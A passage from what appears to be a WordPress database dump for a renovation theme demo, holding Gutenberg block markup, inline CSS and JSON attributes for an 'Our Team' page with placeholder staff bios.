dashicons-instagram\" style=\"color:#000000;font-size:1.5em;text-decoration:none;height:1.5em;width:1.5em\"></span></a></li></ul></div></div></div><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:30px;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:30px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Maria Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400;margin-bottom:15px\"><p>Handyman</p></div><div class=\"skt-blocks-team-description\" style=\"font-family:Poppins;font-size:17px;font-weight:400;line-height:2;margin-bottom:40px\"><p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.</p></div><div class=\"skt-blocks-team-social-icons-wrapper\"><ul class=\"skt-blocks-team-social-icons\"><li style=\"margin-left:10px;margin-right:10px\"><a href=\"\"><span class=\"dashicons dashicons-twitter\" style=\"color:#000000;font-size:1.5em;text-decoration:none;height:1.5em;width:1.5em\"></span></a></li><li style=\"margin-left:10px;margin-right:10px\"><a href=\"\"><span class=\"dashicons dashicons-facebook\" style=\"color:#000000;font-size:1.5em;text-decoration:none;height:1.5em;width:1.5em\"></span></a></li><li style=\"margin-left:10px;margin-right:10px\"><a href=\"\"><span class=\"dashicons dashicons-linkedin\" style=\"color:#000000;font-size:1.5em;text-decoration:none;height:1.5em;width:1.5em\"></span></a></li><li style=\"margin-left:10px;margin-right:10px\"><a href=\"\"><span class=\"dashicons dashicons-instagram\" style=\"color:#000000;font-size:1.5em;text-decoration:none;height:1.5em;width:1.5em\"></span></a></li></ul></div></div></div></div>\n<!-- /wp:skt-blocks/team --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Our Team','','publish','closed','closed','','our-team','','','2022-08-22 00:25:39','2022-08-22 00:25:39','',0,'https://sktperfectdemo.com/themepack/gbrenovate/?page_id=170',0,'page','',0),(342,1,'2021-05-27 05:17:13','2021-05-27 05:17:13','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"ea83512c-9e0a-4c79-a9f2-27978cde243b\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":0,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-team-page\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-team-page skt-blocks-block-section-outer-wrap block-ea83512c-9e0a-4c79-a9f2-27978cde243b background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-ea83512c-9e0a-4c79-a9f2-27978cde243b .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-ea83512c-9e0a-4c79-a9f2-27978cde243b .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-ea83512c-9e0a-4c79-a9f2-27978cde243b .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-ea83512c-9e0a-4c79-a9f2-27978cde243b.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-ea83512c-9e0a-4c79-a9f2-27978cde243b.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-ea83512c-9e0a-4c79-a9f2-27978cde243b.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-ea83512c-9e0a-4c79-a9f2-27978cde243b.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-ea83512c-9e0a-4c79-a9f2-27978cde243b.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 0); }\n</style><style type=\"text/css\"> .block-ea83512c-9e0a-4c79-a9f2-27978cde243b .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-ea83512c-9e0a-4c79-a9f2-27978cde243b .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ea83512c-9e0a-4c79-a9f2-27978cde243b.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-ea83512c-9e0a-4c79-a9f2-27978cde243b .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ea83512c-9e0a-4c79-a9f2-27978cde243b.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-ea83512c-9e0a-4c79-a9f2-27978cde243b .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ea83512c-9e0a-4c79-a9f2-27978cde243b.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 0);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"bd80dab3-ab7e-405a-9093-ae70e5c93624\",\"showSeparator\":false,\"subheadSpacing\":45,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":17,\"headingTitleFontSizeMobile\":17,\"headingTitleFontSizeTablet\":17,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-bd80dab3-ab7e-405a-9093-ae70e5c93624 .responsive-heading-title-text {\n font-size: 17px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-bd80dab3-ab7e-405a-9093-ae70e5c93624 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-bd80dab3-ab7e-405a-9093-ae70e5c93624 .responsive-heading-desc-text {\n margin-bottom: 45px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-bd80dab3-ab7e-405a-9093-ae70e5c93624 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-bd80dab3-ab7e-405a-9093-ae70e5c93624 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-bd80dab3-ab7e-405a-9093-ae70e5c93624 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-bd80dab3-ab7e-405a-9093-ae70e5c93624 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-bd80dab3-ab7e-405a-9093-ae70e5c93624 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-bd80dab3-ab7e-405a-9093-ae70e5c93624 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-bd80dab3-ab7e-405a-9093-ae70e5c93624 .responsive-heading-title-text {\n font-size: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-bd80dab3-ab7e-405a-9093-ae70e5c93624 .responsive-heading-title-text {\n font-size: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-bd80dab3-ab7e-405a-9093-ae70e5c93624 .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-bd80dab3-ab7e-405a-9093-ae70e5c93624 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-bd80dab3-ab7e-405a-9093-ae70e5c93624 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-bd80dab3-ab7e-405a-9093-ae70e5c93624 {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-bd80dab3-ab7e-405a-9093-ae70e5c93624 {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-bd80dab3-ab7e-405a-9093-ae70e5c93624 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-bd80dab3-ab7e-405a-9093-ae70e5c93624\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:500;line-height:1;letter-spacing:0;color:#fe8333\">Leaderships</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Meet Awesome<br>Experts</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:skt-blocks/team {\"teamBlock\":[{\"teamName\":\"Kevin Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamDescription\":\"u003cpu003eLorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.u003c/pu003e\",\"teamImgId\":32,\"teamImgURL\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"10aa7ca43c\",\"delete\":\"c163db9d18\",\"edit\":\"ba86ecc494\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"twitterUrl\":\"\",\"emailAddress\":\"\",\"facebookUrl\":\"\",\"instagramUrl\":\"\",\"youtubeUrl\":\"\",\"pinterestUrl\":\"\",\"linkedinUrl\":\"\"},{\"teamName\":\"Maria Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamDescription\":\"u003cpu003eLorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.u003c/pu003e\",\"teamImgId\":31,\"teamImgURL\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"831de6a10a\",\"delete\":\"cb920ef057\",\"edit\":\"502119efcc\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"twitterUrl\":\"\",\"emailAddress\":\"\",\"facebookUrl\":\"\",\"instagramUrl\":\"\",\"youtubeUrl\":\"\",\"pinterestUrl\":\"\",\"linkedinUrl\":\"\"}],\"gutter\":\"small\",\"designationColor\":\"#494848\",\"socialIconColor\":\"#000000\",\"titleColor\":\"#393939\",\"titleFontWeight\":\"600\",\"designationFontWeight\":\"400\",\"descriptionFontWeight\":\"400\",\"descriptionLineHeight\":2,\"imageSize\":\"large\",\"titleFontFamily\":\"Poppins\",\"designationFontFamily\":\"Poppins\",\"descriptionFontFamily\":\"Poppins\",\"titleFontSize\":20,\"descriptionFontSize\":17,\"imageMarginTop\":30,\"imageMarginBottom\":20,\"iconSize\":\"1.5em\",\"titleSpacing\":0,\"designationSpacing\":15,\"descriptionSpacing\":40,\"socialIconSpacing\":10,\"imageWidth\":260,\"borderColor\":\"#000000\",\"borderWidth\":0,\"borderRadius\":0,\"padding\":30,\"imageShape\":\"square\",\"opacity\":0,\"backgroundPosition\":\"left top\",\"email\":true,\"youtube\":true,\"pinterest\":true} -->\n<div class=\"wp-block-skt-blocks-team-wrapper has-columns has-2-columns has-responsive-columns has-small-gutter\"><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-color:#000000;border-radius:0;padding:30px;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:30px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Kevin Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400;margin-bottom:15px\"><p>Handyman</p></div><div class=\"skt-blocks-team-description\" style=\"font-family:Poppins;font-size:17px;font-weight:400;line-height:2;margin-bottom:40px\"><p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.</p></div><div class=\"skt-blocks-team-social-icons-wrapper\"><ul class=\"skt-blocks-team-social-icons\"><li style=\"margin-left:10px;margin-right:10px\"><a href=\"\"><span class=\"dashicons dashicons-twitter\" style=\"color:#000000;font-size:1.5em;text-decoration:none;height:1.5em;width:1.5em\"></span></a></li><li style=\"margin-left:10px;margin-right:10px\"><a href=\"\"><span class=\"dashicons dashicons-facebook\" style=\"color:#000000;font-size:1.5em;text-decoration:none;height:1.5em;width:1.5em\"></span></a></li><li style=\"margin-left:10px;margin-right:10px\"><a href=\"\"><span class=\"dashicons dashicons-linkedin\" style=\"color:#000000;font-size:1.5em;text-decoration:none;height:1.5em;width:1.5em\"></span></a></li><li style=\"margin-left:10px;margin-right:10px\"><a href=\"\"><span class=\"dashicons dashicons-instagram\" style=\"color:#000000;font-size:1.5em;text-decoration:none;height:1.5em;width:1.5em\"></span></a></li></ul></div></div></div><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-color:#000000;border-radius:0;padding:30px;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:30px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Maria Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400;margin-bottom:15px\"><p>Handyman</p></div><div class=\"skt-blocks-team-description\" style=\"font-family:Poppins;font-size:17px;font-weight:400;line-height:2;margin-bottom:40px\"><p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.</p></div><div class=\"skt-blocks-team-social-icons-wrapper\"><ul class=\"skt-blocks-team-social-icons\"><li style=\"margin-left:10px;margin-right:10px\"><a href=\"\"><span class=\"dashicons dashicons-twitter\" style=\"color:#000000;font-size:1.5em;text-decoration:none;height:1.5em;width:1.5em\"></span></a></li><li style=\"margin-left:10px;margin-right:10px\"><a href=\"\"><span class=\"dashicons dashicons-facebook\" style=\"color:#000000;font-size:1.5em;text-decoration:none;height:1.5em;width:1.5em\"></span></a></li><li style=\"margin-left:10px;margin-right:10px\"><a href=\"\"><span class=\"dashicons dashicons-linkedin\" style=\"color:#000000;font-size:1.5em;text-decoration:none;height:1.5em;width:1.5em\"></span></a></li><li style=\"margin-left:10px;margin-right:10px\"><a href=\"\"><span class=\"dashicons dashicons-instagram\" style=\"color:#000000;font-size:1.5em;text-decoration:none;height:1.5em;width:1.5em\"></span></a></li></ul></div></div></div></div>\n<!-- /wp:skt-blocks/team -->\n\n<!-- wp:spacer {\"height\":20} -->\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/team {\"teamBlock\":[{\"teamName\":\"Kevin Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamDescription\":\"u003cpu003eLorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.u003c/pu003e\",\"teamImgId\":32,\"teamImgURL\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"10aa7ca43c\",\"delete\":\"c163db9d18\",\"edit\":\"ba86ecc494\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"twitterUrl\":\"\",\"emailAddress\":\"\",\"facebookUrl\":\"\",\"instagramUrl\":\"\",\"youtubeUrl\":\"\",\"pinterestUrl\":\"\",\"linkedinUrl\":\"\"},{\"teamName\":\"Maria Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamDescription\":\"u003cpu003eLorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.u003c/pu003e\",\"teamImgId\":31,\"teamImgURL\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"831de6a10a\",\"delete\":\"cb920ef057\",\"edit\":\"502119efcc\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"twitterUrl\":\"\",\"emailAddress\":\"\",\"facebookUrl\":\"\",\"instagramUrl\":\"\",\"youtubeUrl\":\"\",\"pinterestUrl\":\"\",\"linkedinUrl\":\"\"}],\"gutter\":\"small\",\"designationColor\":\"#494848\",\"socialIconColor\":\"#000000\",\"titleColor\":\"#393939\",\"titleFontWeight\":\"600\",\"designationFontWeight\":\"400\",\"descriptionFontWeight\":\"400\",\"descriptionLineHeight\":2,\"imageSize\":\"large\",\"titleFontFamily\":\"Poppins\",\"designationFontFamily\":\"Poppins\",\"descriptionFontFamily\":\"Poppins\",\"titleFontSize\":20,\"descriptionFontSize\":17,\"imageMarginTop\":30,\"imageMarginBottom\":20,\"iconSize\":\"1.5em\",\"titleSpacing\":0,\"designationSpacing\":15,\"descriptionSpacing\":40,\"socialIconSpacing\":10,\"imageWidth\":260,\"borderWidth\":0,\"borderRadius\":0,\"padding\":30,\"imageShape\":\"square\",\"opacity\":0,\"backgroundPosition\":\"left top\",\"email\":true,\"youtube\":true,\"pinterest\":true} -->\n<div class=\"wp-block-skt-blocks-team-wrapper has-columns has-2-columns has-responsive-columns has-small-gutter\"><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:30px;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:30px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Kevin Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400;margin-bottom:15px\"><p>Handyman</p></div><div class=\"skt-blocks-team-description\" style=\"font-family:Poppins;font-size:17px;font-weight:400;line-height:2;margin-bottom:40px\"><p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.</p></div><div class=\"skt-blocks-team-social-icons-wrapper\"><ul class=\"skt-blocks-team-social-icons\"><li style=\"margin-left:10px;margin-right:10px\"><a href=\"\"><span class=\"dashicons dashicons-twitter\" style=\"color:#000000;font-size:1.5em;text-decoration:none;height:1.5em;width:1.5em\"></span></a></li><li style=\"margin-left:10px;margin-right:10px\"><a href=\"\"><span class=\"dashicons dashicons-facebook\" style=\"color:#000000;font-size:1.5em;text-decoration:none;height:1.5em;width:1.5em\"></span></a></li><li style=\"margin-left:10px;margin-right:10px\"><a href=\"\"><span class=\"dashicons dashicons-linkedin\" style=\"color:#000000;font-size:1.5em;text-decoration:none;height:1.5em;width:1.5em\"></span></a></li><li style=\"margin-left:10px;margin-right:10px\"><a href=\"\"><span class=\"dashicons dashicons-instagram\" 